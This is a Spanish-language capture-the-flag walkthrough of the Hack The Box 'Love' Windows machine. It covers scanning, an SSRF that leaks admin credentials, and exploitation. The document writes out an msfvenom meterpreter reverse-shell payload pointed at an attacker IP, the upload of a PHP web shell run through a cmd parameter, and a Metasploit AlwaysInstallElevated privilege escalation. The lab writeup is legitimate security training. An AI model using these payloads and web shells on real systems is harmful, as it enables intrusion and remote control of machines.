Cu3rv0x
Love

Love


HTB Windows

nmap -A -p- -oA love 10.129.2.217 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA love 10.129.2.217

nmap -sU -O -p- -oA love-udp 10.129.2.217

nikto -h 10.129.2.217:80

gobuster dir -k -u http://10.129.2.217/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

ssh_command.

echo “10.129.2.217 staging.love.htb” | sudo tee -a /etc/hosts

ssh_command.

Le damos click a demo

ssh_command.

Metemos http:127.0.0.1:443 y vemos el error

ssh_command.

Metemos http:127.0.0.1:5000 y vemos la contrasena

ssh_command.

Metemos las credenciales en http://10.129.2.217/admin

ssh_command.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.94 LPORT=3333 -f exe -o logo.exe

ssh_command.

Vamos al dashboard y subimos el archivo logo.exe

ssh_command.

Modificamos simple-backdoor.php y subimos el archivo tambien.

cp /usr/share/webshells/php/simple-backdoor.php .

ssh_command.

ssh_command.

http://10.129.2.217/images/simple-backdoor.php?cmd=whoami

ssh_command.

ssh_command.

msf6> use exploit/multi/handler

msf6> set LHOST tun0

msf6> set LPORT 3333

msf6>set payload windows/meterpreter/reverse_tcp

msf6>run

ssh_command.

http://10.129.2.217/images/simple-backdoor.php?cmd=logo.exe

ssh_command.

Nos vamos a C:\Users\Phoebe\Desktop

ssh_command.

msf6> use exploit/windows/local/always_install_elevated

msf6> set LHOST tun0

msf6> set LPORT 3333

msf6>set session 1

msf6>run

ssh_command.

© 2025 Cu3rv0x